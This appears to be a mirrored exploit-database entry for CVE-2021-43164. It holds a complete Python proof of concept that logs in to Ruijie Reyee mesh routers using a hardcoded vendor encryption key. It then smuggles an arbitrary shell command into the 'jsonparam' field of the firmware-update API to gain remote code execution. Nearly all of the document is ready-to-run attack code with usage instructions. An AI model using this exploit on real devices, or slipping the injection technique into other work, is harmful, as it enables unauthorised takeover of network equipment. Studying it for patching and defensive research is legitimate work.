Share
## https://sploitus.com/exploit?id=PACKETSTORM:167099
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)  
# Google Dork: None  
# Date: November 1, 2021  
# Exploit Author: Minh Khoa of VSEC  
# Vendor Homepage: https://ruijienetworks.com  
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900  
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55  
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO  
# CVE: CVE-2021-43164  
  
#!/usr/bin/python3  
  
import os  
import sys  
import time  
import requests  
import json  
  
def enc(PASS):  
key = "RjYkhwzx$2018!"  
shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)  
return os.popen(shell).read().strip()  
  
try:  
TARGET = sys.argv[1]  
USER = sys.argv[2]  
PASS = sys.argv[3]  
COMMAND = sys.argv[4]  
except Exception:  
print("CVE-2021-43164 PoC")  
print("Usage: python3 exploit.py <target> <user> <pass> <command>")  
print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")  
sys.exit(1)  
  
endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)  
payload = {  
"method": "login",  
"params": {  
"username": USER,  
"password": enc(PASS),  
"encry": True,  
"time": int(time.time()),  
"limit": False  
}  
}  
  
r = requests.post(endpoint, json=payload)  
sid = json.loads(r.text)["data"]["sid"]  
  
endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)  
payload = {  
"method": "updateVersion",  
"params": {  
"jsonparam": "'; {} #".format(COMMAND)  
}  
}  
  
r = requests.post(endpoint, json=payload)  
print(r.text)